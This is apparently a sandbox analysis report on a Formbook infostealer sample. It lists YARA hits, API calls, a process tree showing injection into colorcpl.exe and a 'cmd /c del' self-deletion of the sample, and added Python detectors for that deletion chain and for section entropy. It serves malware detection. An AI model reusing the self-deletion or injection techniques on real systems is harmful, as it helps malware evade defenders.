          Source: 00000001.00000002.381507015.0000000003639000.00000004.00000001.sdmp, type: MEMORY | Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000001.00000002.381507015.0000000003639000.00000004.00000001.sdmp, type: MEMORY | Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000004.00000000.417306189.000000000F67C000.00000040.00020000.sdmp, type: MEMORY | Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000004.00000000.417306189.000000000F67C000.00000040.00020000.sdmp, type: MEMORY | Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000003.00000002.451243764.00000000013D0000.00000040.00020000.sdmp, type: MEMORY | Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000003.00000002.451243764.00000000013D0000.00000040.00020000.sdmp, type: MEMORY | Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 0000000A.00000002.616603392.00000000048E0000.00000004.00000001.sdmp, type: MEMORY | Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 0000000A.00000002.616603392.00000000048E0000.00000004.00000001.sdmp, type: MEMORY | Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000003.00000002.451277179.0000000001400000.00000040.00020000.sdmp, type: MEMORY | Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000003.00000002.451277179.0000000001400000.00000040.00020000.sdmp, type: MEMORY | Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 0000000A.00000002.613983014.0000000000960000.00000040.00020000.sdmp, type: MEMORY | Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 0000000A.00000002.613983014.0000000000960000.00000040.00020000.sdmp, type: MEMORY | Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000003.00000002.450526956.0000000000400000.00000040.00000001.sdmp, type: MEMORY | Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000003.00000002.450526956.0000000000400000.00000040.00000001.sdmp, type: MEMORY | Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: C:\Users\user\Desktop\arrival notice.exe | Code function: 1_2_009DE618
          Source: C:\Users\user\Desktop\arrival notice.exe | Code function: 1_2_009DE612
          Source: C:\Users\user\Desktop\arrival notice.exe | Code function: 3_2_00401030
          Source: C:\Users\user\Desktop\arrival notice.exe | Code function: 3_2_0041B8DB
          Source: C:\Users\user\Desktop\arrival notice.exe | Code function: 3_2_0041C136
          Source: C:\Users\user\Desktop\arrival notice.exe | Code function: 3_2_0041D229
          Source: C:\Users\user\Desktop\arrival notice.exe | Code function: 3_2_00408C6B
          Source: C:\Users\user\Desktop\arrival notice.exe | Code function: 3_2_00408C70
          Source: C:\Users\user\Desktop\arrival notice.exe | Code function: 3_2_00402D87
          Source: C:\Users\user\Desktop\arrival notice.exe | Code function: 3_2_00402D90
          Source: C:\Users\user\Desktop\arrival notice.exe | Code function: 3_2_00402FB0
          Source: C:\Windows\SysWOW64\colorcpl.exe | Code function: 10_2_04B720A0
          Source: C:\Windows\SysWOW64\colorcpl.exe | Code function: 10_2_04B5B090
          Source: C:\Windows\SysWOW64\colorcpl.exe | Code function: 10_2_04C120A8
          Source: C:\Windows\SysWOW64\colorcpl.exe | Code function: 10_2_04B5841F
          Source: C:\Windows\SysWOW64\colorcpl.exe | Code function: 10_2_04C01002
          Source: C:\Windows\SysWOW64\colorcpl.exe | Code function: 10_2_04B72581
          Source: C:\Windows\SysWOW64\colorcpl.exe | Code function: 10_2_04B5D5E0
          Source: C:\Windows\SysWOW64\colorcpl.exe | Code function: 10_2_04B40D20
          Source: C:\Windows\SysWOW64\colorcpl.exe | Code function: 10_2_04C11D55
          Source: C:\Windows\SysWOW64\colorcpl.exe | Code function: 10_2_04B64120
          Source: C:\Windows\SysWOW64\colorcpl.exe | Code function: 10_2_04B4F900
          Source: C:\Windows\SysWOW64\colorcpl.exe | Code function: 10_2_04C12D07
          Source: C:\Windows\SysWOW64\colorcpl.exe | Code function: 10_2_04C12EF7
          Source: C:\Windows\SysWOW64\colorcpl.exe | Code function: 10_2_04C122AE
          Source: C:\Windows\SysWOW64\colorcpl.exe | Code function: 10_2_04B66E30
          Source: C:\Windows\SysWOW64\colorcpl.exe | Code function: 10_2_04B7EBB0
          Source: C:\Windows\SysWOW64\colorcpl.exe | Code function: 10_2_04C0DBD2
          Source: C:\Windows\SysWOW64\colorcpl.exe | Code function: 10_2_04C11FF1
          Source: C:\Windows\SysWOW64\colorcpl.exe | Code function: 10_2_04C12B28
          Source: C:\Windows\SysWOW64\colorcpl.exe | Code function: 10_2_0097B8DB
          Source: C:\Windows\SysWOW64\colorcpl.exe | Code function: 10_2_0097C136
          Source: C:\Windows\SysWOW64\colorcpl.exe | Code function: 10_2_0097D229
          Source: C:\Windows\SysWOW64\colorcpl.exe | Code function: 10_2_00968C70
          Source: C:\Windows\SysWOW64\colorcpl.exe | Code function: 10_2_00968C6B
          Source: C:\Windows\SysWOW64\colorcpl.exe | Code function: 10_2_00962D90
          Source: C:\Windows\SysWOW64\colorcpl.exe | Code function: 10_2_00962D87
          Source: C:\Windows\SysWOW64\colorcpl.exe | Code function: 10_2_00962FB0
          Source: C:\Windows\SysWOW64\colorcpl.exe | Code function: String function: 04B4B150 appears 35 times
          Source: C:\Users\user\Desktop\arrival notice.exe | Code function: 3_2_004185D0 NtCreateFile
          Source: C:\Users\user\Desktop\arrival notice.exe | Code function: 3_2_00418680 NtReadFile
          Source: C:\Users\user\Desktop\arrival notice.exe | Code function: 3_2_00418700 NtClose
          Source: C:\Users\user\Desktop\arrival notice.exe | Code function: 3_2_004187B0 NtAllocateVirtualMemory
          Source: C:\Users\user\Desktop\arrival notice.exe | Code function: 3_2_004185CA NtCreateFile
          Source: C:\Users\user\Desktop\arrival notice.exe | Code function: 3_2_0041867C NtReadFile
          Source: C:\Users\user\Desktop\arrival notice.exe | Code function: 3_2_004186FB NtClose
          Source: C:\Users\user\Desktop\arrival notice.exe | Code function: 3_2_004187AC NtAllocateVirtualMemory
          Source: C:\Windows\SysWOW64\colorcpl.exe | Code function: 10_2_04B89860 NtQuerySystemInformation, LdrInitializeThunk
          Source: C:\Windows\SysWOW64\colorcpl.exe | Code function: 10_2_04B89840 NtDelayExecution, LdrInitializeThunk
          Source: C:\Windows\SysWOW64\colorcpl.exe | Code function: 10_2_04B899A0 NtCreateSection, LdrInitializeThunk
          Source: C:\Windows\SysWOW64\colorcpl.exe | Code function: 10_2_04B895D0 NtClose, LdrInitializeThunk
          Source: C:\Windows\SysWOW64\colorcpl.exe | Code function: 10_2_04B89910 NtAdjustPrivilegesToken, LdrInitializeThunk
          Source: C:\Windows\SysWOW64\colorcpl.exe | Code function: 10_2_04B89540 NtReadFile, LdrInitializeThunk
          Source: C:\Windows\SysWOW64\colorcpl.exe | Code function: 10_2_04B896E0 NtFreeVirtualMemory, LdrInitializeThunk
          Source: C:\Windows\SysWOW64\colorcpl.exe | Code function: 10_2_04B896D0 NtCreateKey, LdrInitializeThunk
          Source: C:\Windows\SysWOW64\colorcpl.exe | Code function: 10_2_04B89660 NtAllocateVirtualMemory, LdrInitializeThunk
          Source: C:\Windows\SysWOW64\colorcpl.exe | Code function: 10_2_04B89650 NtQueryValueKey, LdrInitializeThunk
          Source: C:\Windows\SysWOW64\colorcpl.exe | Code function: 10_2_04B89A50 NtCreateFile, LdrInitializeThunk
          Source: C:\Windows\SysWOW64\colorcpl.exe | Code function: 10_2_04B89780 NtMapViewOfSection, LdrInitializeThunk
          Source: C:\Windows\SysWOW64\colorcpl.exe | Code function: 10_2_04B89FE0 NtCreateMutant, LdrInitializeThunk
          Source: C:\Windows\SysWOW64\colorcpl.exe | Code function: 10_2_04B89710 NtQueryInformationToken, LdrInitializeThunk
          Source: C:\Windows\SysWOW64\colorcpl.exe | Code function: 10_2_04B898A0 NtWriteVirtualMemory
          Source: C:\Windows\SysWOW64\colorcpl.exe | Code function: 10_2_04B898F0 NtReadVirtualMemory
          Source: C:\Windows\SysWOW64\colorcpl.exe | Code function: 10_2_04B89820 NtEnumerateKey
          Source: C:\Windows\SysWOW64\colorcpl.exe | Code function: 10_2_04B8B040 NtSuspendThread
          Source: C:\Windows\SysWOW64\colorcpl.exe | Code function: 10_2_04B895F0 NtQueryInformationFile
          Source: C:\Windows\SysWOW64\colorcpl.exe | Code function: 10_2_04B899D0 NtCreateProcessEx
          Source: C:\Windows\SysWOW64\colorcpl.exe | Code function: 10_2_04B8AD30 NtSetContextThread
          Source: C:\Windows\SysWOW64\colorcpl.exe | Code function: 10_2_04B89520 NtWaitForSingleObject
          Source: C:\Windows\SysWOW64\colorcpl.exe | Code function: 10_2_04B89560 NtWriteFile
          Source: C:\Windows\SysWOW64\colorcpl.exe | Code function: 10_2_04B89950 NtQueueApcThread
          Source: C:\Windows\SysWOW64\colorcpl.exe | Code function: 10_2_04B89A80 NtOpenDirectoryObject
          Source: C:\Windows\SysWOW64\colorcpl.exe | Code function: 10_2_04B89A20 NtResumeThread
          Source: C:\Windows\SysWOW64\colorcpl.exe | Code function: 10_2_04B89610 NtEnumerateValueKey
          Source: C:\Windows\SysWOW64\colorcpl.exe | Code function: 10_2_04B89A10 NtQuerySection
          Source: C:\Windows\SysWOW64\colorcpl.exe | Code function: 10_2_04B89A00 NtProtectVirtualMemory
          Source: C:\Windows\SysWOW64\colorcpl.exe | Code function: 10_2_04B89670 NtQueryInformationProcess
          Source: C:\Windows\SysWOW64\colorcpl.exe | Code function: 10_2_04B8A3B0 NtGetContextThread
          Source: C:\Windows\SysWOW64\colorcpl.exe | Code function: 10_2_04B897A0 NtUnmapViewOfSection
          Source: C:\Windows\SysWOW64\colorcpl.exe | Code function: 10_2_04B89730 NtQueryVirtualMemory
          Source: C:\Windows\SysWOW64\colorcpl.exe | Code function: 10_2_04B8A710 NtOpenProcessToken
          Source: C:\Windows\SysWOW64\colorcpl.exe | Code function: 10_2_04B89B00 NtSetValueKey
          Source: C:\Windows\SysWOW64\colorcpl.exe | Code function: 10_2_04B89770 NtSetInformationFile
          Source: C:\Windows\SysWOW64\colorcpl.exe | Code function: 10_2_04B8A770 NtOpenThread
          Source: C:\Windows\SysWOW64\colorcpl.exe | Code function: 10_2_04B89760 NtOpenProcess
          Source: C:\Windows\SysWOW64\colorcpl.exe | Code function: 10_2_009785D0 NtCreateFile
          Source: C:\Windows\SysWOW64\colorcpl.exe | Code function: 10_2_00978680 NtReadFile
          Source: C:\Windows\SysWOW64\colorcpl.exe | Code function: 10_2_009787B0 NtAllocateVirtualMemory
          Source: C:\Windows\SysWOW64\colorcpl.exe | Code function: 10_2_00978700 NtClose
          Source: C:\Windows\SysWOW64\colorcpl.exe | Code function: 10_2_009785CA NtCreateFile
          Source: C:\Windows\SysWOW64\colorcpl.exe | Code function: 10_2_009786FB NtClose
          Source: C:\Windows\SysWOW64\colorcpl.exe | Code function: 10_2_0097867C NtReadFile
          Source: C:\Windows\SysWOW64\colorcpl.exe | Code function: 10_2_009787AC NtAllocateVirtualMemory
          Source: arrival notice.exe, 00000001.00000002.381507015.0000000003639000.00000004.00000001.sdmp | Binary or memory string: OriginalFilenameCF_Secretaria.dll< vs arrival notice.exe
          Source: arrival notice.exe, 00000001.00000000.347284510.00000000002C2000.00000002.00020000.sdmp | Binary or memory string: OriginalFilenameIsolatedStora.exeh$ vs arrival notice.exe
          Source: arrival notice.exe, 00000001.00000002.381149131.0000000002647000.00000004.00000001.sdmp | Binary or memory string: OriginalFilenameEnvoySinks.dll6 vs arrival notice.exe
          Source: arrival notice.exe, 00000003.00000002.450859153.0000000000B62000.00000002.00020000.sdmp | Binary or memory string: OriginalFilenameIsolatedStora.exeh$ vs arrival notice.exe
          Source: arrival notice.exe, 00000003.00000002.451810551.000000000159F000.00000040.00000001.sdmp | Binary or memory string: OriginalFilenamentdll.dllj% vs arrival notice.exe
          Source: arrival notice.exe, 00000003.00000002.452694295.0000000003463000.00000040.00020000.sdmp | Binary or memory string: OriginalFilenamecolorcpl.exej% vs arrival notice.exe
          Source: arrival notice.exe | Binary or memory string: OriginalFilenameIsolatedStora.exeh$ vs arrival notice.exe
          Source: arrival notice.exe | Static PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
          Source: arrival notice.exe | Static PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
          Source: arrival notice.exe | Static PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
          Source: arrival notice.exe | Static PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
          Source: arrival notice.exe | Static PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
          Source: C:\Users\user\Desktop\arrival notice.exe | Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
          Source: unknown | Process created: C:\Users\user\Desktop\arrival notice.exe 'C:\Users\user\Desktop\arrival notice.exe'
          Source: C:\Users\user\Desktop\arrival notice.exe | Process created: C:\Users\user\Desktop\arrival notice.exe C:\Users\user\Desktop\arrival notice.exe
          Source: C:\Windows\explorer.exe | Process created: C:\Windows\SysWOW64\colorcpl.exe C:\Windows\SysWOW64\colorcpl.exe
          Source: C:\Windows\SysWOW64\colorcpl.exe | Process created: C:\Windows\SysWOW64\cmd.exe /c del 'C:\Users\user\Desktop\arrival notice.exe'
          Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
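The process tree listed above is the chain a detection should correlate: explorer.exe starts colorcpl.exe with no arguments, and colorcpl.exe (not the sample) runs cmd.exe /c del against the sample on the Desktop. The Python below is an added example, not part of this report or of the sandbox's detection engine. EVENTS is constructed to mirror the tree shown; the pids are invented, and the field names (pid, ppid, image, cmdline) are assumptions standing in for the equivalent Sysmon Event ID 1 fields.

```python
"""Correlate process-creation events to flag a sample being deleted by a
process it did not visibly spawn, the chain this report shows:
explorer.exe -> colorcpl.exe -> cmd.exe /c del '<sample>'.

Added example, not part of the sandbox or its detection engine. EVENTS
is constructed to mirror the report's tree; the pids are invented and
the field names (pid, ppid, image, cmdline) are assumptions standing in
for the equivalent Sysmon Event ID 1 fields."""
import re
from typing import Dict, List

# Constructed Sysmon-style process-creation records (not sandbox output).
EVENTS: List[Dict] = [
    {"pid": 100, "ppid": 1, "image": r"C:\Windows\explorer.exe", "cmdline": "explorer.exe"},
    {"pid": 6100, "ppid": 100, "image": r"C:\Users\user\Desktop\arrival notice.exe",
     "cmdline": r"'C:\Users\user\Desktop\arrival notice.exe'"},
    {"pid": 6120, "ppid": 6100, "image": r"C:\Users\user\Desktop\arrival notice.exe",
     "cmdline": r"C:\Users\user\Desktop\arrival notice.exe"},
    {"pid": 6200, "ppid": 100, "image": r"C:\Windows\SysWOW64\colorcpl.exe",
     "cmdline": r"C:\Windows\SysWOW64\colorcpl.exe"},
    {"pid": 6240, "ppid": 6200, "image": r"C:\Windows\SysWOW64\cmd.exe",
     "cmdline": r"/c del 'C:\Users\user\Desktop\arrival notice.exe'"},
    {"pid": 6260, "ppid": 6240, "image": r"C:\Windows\System32\conhost.exe",
     "cmdline": r"C:\Windows\system32\conhost.exe 0xffffffff -ForceV1"},
    # Benign noise: an interactive shell deleting a document.
    {"pid": 7000, "ppid": 100, "image": r"C:\Windows\System32\cmd.exe", "cmdline": "cmd.exe"},
    {"pid": 7010, "ppid": 7000, "image": r"C:\Windows\System32\cmd.exe",
     "cmdline": r'/c del "C:\Users\user\notes.txt"'},
]

# cmd.exe built-in: del [/p /f /s /q /a[:attrs]] <path>; the path may be
# quoted with " or ' (the sandbox prints single quotes).
DEL_RE = re.compile(r"""(?ix)
    \b(?:del|erase)\b
    (?:\s+/[a-z](?::[a-z]+)?)*
    \s+["']?(?P<path>[^"']+?)["']?\s*$
""")


def normalize(path: str) -> str:
    """Case-fold and strip quotes so image paths and del targets compare."""
    return path.strip().strip("\"'").lower()


def basename(path: str) -> str:
    return normalize(path).rsplit("\\", 1)[-1]


def ancestry(by_pid: Dict[int, Dict], pid: int) -> List[str]:
    """Image paths from pid upward to the root we have records for."""
    chain, seen = [], set()
    while pid in by_pid and pid not in seen:
        seen.add(pid)
        chain.append(by_pid[pid]["image"])
        pid = by_pid[pid]["ppid"]
    return chain


def looks_like_hollowed_host(by_pid: Dict[int, Dict], pid: int) -> bool:
    """Heuristic from the report's tree: a binary under C:\\Windows started
    by explorer.exe whose command line is nothing but its own path."""
    e = by_pid.get(pid)
    parent = by_pid.get(e["ppid"]) if e else None
    if e is None or parent is None:
        return False
    under_windows = normalize(e["image"]).startswith("c:\\windows\\")
    no_args = normalize(e["cmdline"]) == normalize(e["image"])
    return under_windows and no_args and basename(parent["image"]) == "explorer.exe"


def find_sample_deletion(events: List[Dict]) -> List[Dict]:
    """Flag cmd.exe deleting a file that ran as a process in this data set."""
    by_pid = {e["pid"]: e for e in events}
    images = {normalize(e["image"]) for e in events}
    findings = []
    for e in events:
        if basename(e["image"]) != "cmd.exe":
            continue
        m = DEL_RE.search(e["cmdline"])
        if not m:
            continue
        target = normalize(m.group("path"))
        if target not in images:
            continue  # deleting something that never executed: out of scope here
        chain = ancestry(by_pid, e["ppid"])
        kind = "self-deletion" if target in map(normalize, chain) else "proxy deletion"
        findings.append({
            "cmd_pid": e["pid"],
            "target": target,
            "kind": kind,  # proxy deletion means the deleter is not the sample's descendant
            "chain": " <- ".join(basename(p) for p in chain),
            "hollowed_host": looks_like_hollowed_host(by_pid, e["ppid"]),
        })
    return findings


if __name__ == "__main__":
    for f in find_sample_deletion(EVENTS):
        print(f)
```

The proxy-deletion match carries the signal: the file being deleted ran as a process, but the deleting cmd.exe descends from explorer.exe and a system binary rather than from the sample, which only makes sense if the sample's code is now executing inside those processes. The hollowed-host heuristic on its own is noisy (explorer.exe legitimately launches Control Panel applets such as colorcpl.exe with no arguments), so it is reported as a supporting field rather than as an alert.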
          Source: C:\Windows\explorer.exe | Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{6C3EE638-B588-4D7D-B30A-E7E36759305D}\InprocServer32
          Source: C:\Users\user\Desktop\arrival notice.exe | File created: C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\arrival notice.exe.log
          Source: classification engine | Classification label: mal100.troj.evad.winEXE@7/1@7/3
          Source: C:\Users\user\Desktop\arrival notice.exe | Section loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\a152fe02a317a77aeee36903305e8ba6\mscorlib.ni.dll
          Source: C:\Windows\System32\conhost.exe | Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6240:120:WilError_01
          Source: arrival notice.exe, Form1.cs | Cryptographic APIs: 'TransformFinalBlock', 'CreateDecryptor'
          Source: 1.2.arrival notice.exe.220000.0.unpack, Form1.cs | Cryptographic APIs: 'TransformFinalBlock', 'CreateDecryptor'
          Source: 1.0.arrival notice.exe.220000.0.unpack, Form1.cs | Cryptographic APIs: 'TransformFinalBlock', 'CreateDecryptor'
          Source: 3.0.arrival notice.exe.ac0000.0.unpack, Form1.cs | Cryptographic APIs: 'TransformFinalBlock', 'CreateDecryptor'
          Source: 3.2.arrival notice.exe.ac0000.1.unpack, Form1.cs | Cryptographic APIs: 'TransformFinalBlock', 'CreateDecryptor'
          Source: C:\Windows\explorer.exe | File read: C:\Windows\System32\drivers\etc\hosts
          Source: C:\Windows\explorer.exe | File read: C:\Windows\System32\drivers\etc\hosts
          Source: C:\Users\user\Desktop\arrival notice.exe | File opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dll
          Source: arrival notice.exe | Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR
          Source: arrival notice.exe | Static PE information: NO_SEH, TERMINAL_SERVER_AWARE, DYNAMIC_BASE, NX_COMPAT
          Source: Binary string: colorcpl.pdbGCTL source: arrival notice.exe, 00000003.00000002.452677257.0000000003460000.00000040.00020000.sdmp
          Source: Binary string: colorcpl.pdb source: arrival notice.exe, 00000003.00000002.452677257.0000000003460000.00000040.00020000.sdmp
          Source: Binary string: wntdll.pdbUGP source: arrival notice.exe, 00000003.00000002.451810551.000000000159F000.00000040.00000001.sdmp, colorcpl.exe, 0000000A.00000002.616762528.0000000004B20000.00000040.00000001.sdmp
          Source: Binary string: wntdll.pdb source: arrival notice.exe, 00000003.00000002.451810551.000000000159F000.00000040.00000001.sdmp, colorcpl.exe

          Data Obfuscation:

          .NET source code contains potential unpacker
          Source: arrival notice.exe, Form1.cs | .Net Code: _X_X0FT_FT2 System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
          Source: 1.2.arrival notice.exe.220000.0.unpack, Form1.cs | .Net Code: _X_X0FT_FT2 System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
          Source: 1.0.arrival notice.exe.220000.0.unpack, Form1.cs | .Net Code: _X_X0FT_FT2 System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
          Source: 3.0.arrival notice.exe.ac0000.0.unpack, Form1.cs | .Net Code: _X_X0FT_FT2 System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
          Source: 3.2.arrival notice.exe.ac0000.1.unpack, Form1.cs | .Net Code: _X_X0FT_FT2 System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
          Source: C:\Users\user\Desktop\arrival notice.exe | Code function: 1_2_0022297F push 20000001h; retf 1_2_00222992
          Source: C:\Users\user\Desktop\arrival notice.exe | Code function: 3_2_0041B87C push eax; ret 3_2_0041B882
          Source: C:\Users\user\Desktop\arrival notice.exe | Code function: 3_2_0041B812 push eax; ret 3_2_0041B818
          Source: C:\Users\user\Desktop\arrival notice.exe | Code function: 3_2_0041B81B push eax; ret 3_2_0041B882
          Source: C:\Users\user\Desktop\arrival notice.exe | Code function: 3_2_00412A95 pushfd ; retf 3_2_00412A96
          Source: C:\Users\user\Desktop\arrival notice.exe | Code function: 3_2_00415BB5 push eax; retf 3_2_00415BBB
          Source: C:\Users\user\Desktop\arrival notice.exe | Code function: 3_2_004186CA push edx; retn 0076h 3_2_004186CB
          Source: C:\Users\user\Desktop\arrival notice.exe | Code function: 3_2_0040169B push es; iretd 3_2_0040169D
          Source: C:\Users\user\Desktop\arrival notice.exe | Code function: 3_2_00414EA9 push es; ret 3_2_00414EAB
          Source: C:\Users\user\Desktop\arrival notice.exe | Code function: 3_2_0041B7C5 push eax; ret 3_2_0041B818
          Source: C:\Users\user\Desktop\arrival notice.exe | Code function: 3_2_00AC297F push 20000001h; retf 3_2_00AC2992
          Source: C:\Windows\SysWOW64\colorcpl.exe | Code function: 10_2_04B9D0D1 push ecx; ret 10_2_04B9D0E4
          Source: C:\Windows\SysWOW64\colorcpl.exe | Code function: 10_2_0097B812 push eax; ret 10_2_0097B818
          Source: C:\Windows\SysWOW64\colorcpl.exe | Code function: 10_2_0097B81B push eax; ret 10_2_0097B882
          Source: C:\Windows\SysWOW64\colorcpl.exe | Code function: 10_2_0097B87C push eax; ret 10_2_0097B882
          Source: C:\Windows\SysWOW64\colorcpl.exe | Code function: 10_2_00972A95 pushfd ; retf 10_2_00972A96
          Source: C:\Windows\SysWOW64\colorcpl.exe | Code function: 10_2_00975BB5 push eax; retf 10_2_00975BBB
          Source: C:\Windows\SysWOW64\colorcpl.exe | Code function: 10_2_0096169B push es; iretd 10_2_0096169D
          Source: C:\Windows\SysWOW64\colorcpl.exe | Code function: 10_2_00974EA9 push es; ret 10_2_00974EAB
          Source: C:\Windows\SysWOW64\colorcpl.exe | Code function: 10_2_009786CA push edx; retn 0076h 10_2_009786CB
          Source: C:\Windows\SysWOW64\colorcpl.exe | Code function: 10_2_0097B7C5 push eax; ret 10_2_0097B818
          Source: initial sample | Static PE information: section name: .text entropy: 7.50720151133
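The entropy figure above is the number the sandbox derives from the raw bytes of the .text section, and 7.5 bits per byte in a code section is far above what compiled code produces; together with the CreateDecryptor/TransformFinalBlock calls and Assembly.Load(System.Byte[]) listed earlier, it is consistent with an encrypted payload stored inside the assembly. The following Python is an added example, not the sandbox's tooling: it parses a PE section table and scores each section. build_test_pe() constructs a synthetic PE32 (its section contents are made up here, not bytes from the analysed sample) so the parser runs offline; pass a real file path on the command line to score it instead.

```python
"""Per-section Shannon entropy of a PE file, the measurement behind the
report's 'section name: .text entropy: 7.50720151133' line. Ordinary
x86 or CIL code sits well below 7 bits per byte; a code section near 8
is carrying compressed or encrypted data that is unpacked at run time.

Added example, not the sandbox's tooling. build_test_pe() constructs a
synthetic PE32 so the parser runs offline; its contents are not bytes
from the analysed sample."""
import math
import random
import struct
import sys
from collections import Counter
from typing import Dict, List

PE_SIGNATURE = b"PE\0\0"
SECTION_HEADER_SIZE = 40
IMAGE_SCN_MEM_EXECUTE = 0x20000000
HIGH_ENTROPY = 7.0  # bits per byte; 8.0 is the ceiling (uniformly random)


def shannon_entropy(data: bytes) -> float:
    """H = -sum(p_i * log2 p_i) over the byte frequencies of data."""
    if not data:
        return 0.0
    n = len(data)
    return -sum(c / n * math.log2(c / n) for c in Counter(data).values())


def parse_sections(pe: bytes) -> List[Dict]:
    """Walk the section table and measure each section's raw file bytes."""
    if pe[:2] != b"MZ":
        raise ValueError("missing MZ header")
    e_lfanew = struct.unpack_from("<I", pe, 0x3C)[0]
    if pe[e_lfanew:e_lfanew + 4] != PE_SIGNATURE:
        raise ValueError("missing PE signature")
    coff = e_lfanew + 4
    # IMAGE_FILE_HEADER: NumberOfSections at +2, SizeOfOptionalHeader at +16
    num_sections = struct.unpack_from("<H", pe, coff + 2)[0]
    opt_size = struct.unpack_from("<H", pe, coff + 16)[0]
    table = coff + 20 + opt_size
    sections = []
    for idx in range(num_sections):
        off = table + idx * SECTION_HEADER_SIZE
        (name, _vsize, vaddr, raw_size, raw_ptr,
         _reloc, _lines, _nreloc, _nlines, chars) = struct.unpack_from("<8sIIIIIIHHI", pe, off)
        raw = pe[raw_ptr:raw_ptr + raw_size]
        sections.append({
            "name": name.rstrip(b"\0").decode("ascii", errors="replace"),
            "virtual_address": vaddr,
            "raw_size": raw_size,
            "executable": bool(chars & IMAGE_SCN_MEM_EXECUTE),
            "entropy": shannon_entropy(raw),
        })
    return sections


def suspicious_sections(sections: List[Dict], threshold: float = HIGH_ENTROPY) -> List[str]:
    """Names of executable sections whose entropy is at or above the threshold."""
    return [s["name"] for s in sections if s["executable"] and s["entropy"] >= threshold]


def build_test_pe(seed: int = 1) -> bytes:
    """Constructed PE32 with a high-entropy .text and a low-entropy .rsrc."""
    rng = random.Random(seed)
    text = bytes(rng.randrange(256) for _ in range(0x400))   # stands in for packed code
    rsrc = (b"RT_ICON padding " * 32)[:0x200]                 # repetitive resource bytes
    layout = [(b".text", text, 0x1000, 0x60000020),            # CNT_CODE|MEM_EXECUTE|MEM_READ
              (b".rsrc", rsrc, 0x2000, 0x40000040)]            # CNT_INITIALIZED_DATA|MEM_READ
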